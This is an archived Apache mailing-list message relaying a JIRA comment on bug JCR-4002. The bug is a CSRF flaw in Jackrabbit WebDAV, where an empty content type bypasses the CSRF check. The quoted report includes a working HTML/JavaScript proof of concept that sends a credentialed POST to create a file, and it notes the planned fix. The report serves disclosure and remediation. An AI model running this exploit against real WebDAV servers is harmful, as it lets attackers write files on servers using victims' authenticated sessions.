jackrabbit-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Julian Reschke (JIRA)" <j...@apache.org>
Subject [jira] [Commented] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type
Date Wed, 31 Aug 2016 12:41:20 GMT

    [ https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15452125#comment-15452125
] 

Julian Reschke commented on JCR-4002:
-------------------------------------

Backed out the changes in [r1758597|http://svn.apache.org/r1758597].

> CSRF in Jackrabbit-Webdav using empty content-type
> --------------------------------------------------
>
>                 Key: JCR-4002
>                 URL: https://issues.apache.org/jira/browse/JCR-4002
>             Project: Jackrabbit Content Repository
>          Issue Type: Bug
>          Components: jackrabbit-webdav
>    Affects Versions: 2.13.1
>            Reporter: Dominique Jäggi
>            Assignee: Dominique Jäggi
>            Priority: Blocker
>              Labels: csrf, security, webdav
>             Fix For: 2.13.2
>
>         Attachments: JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request content type.
This can be exploited to create a resource via CSRF like so:
> {code}
> <html>
>   <body>
>     <script>
>       function submitRequest()
>       {
>         var xhr = new XMLHttpRequest();
>         xhr.open("POST", "http://localhost:42427/test/csrf.txt", true);
>         xhr.withCredentials = true;
>         var body = "This file has been uploaded via CSRF.=\r\n";
>         var aBody = new Uint8Array(body.length);
>         for (var i = 0; i < aBody.length; i++)
>           aBody[i] = body.charCodeAt(i); 
>         xhr.send(new Blob([aBody]));
>       }
>     </script>
>     <form action="#">
>       <input type="button" value="Submit request" onclick="submitRequest();" />
>     </form>
>   </body>
> </html>
> {code}
> I will mitigate this particular issue by including a null content type in the list of
rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)

Mime
View raw message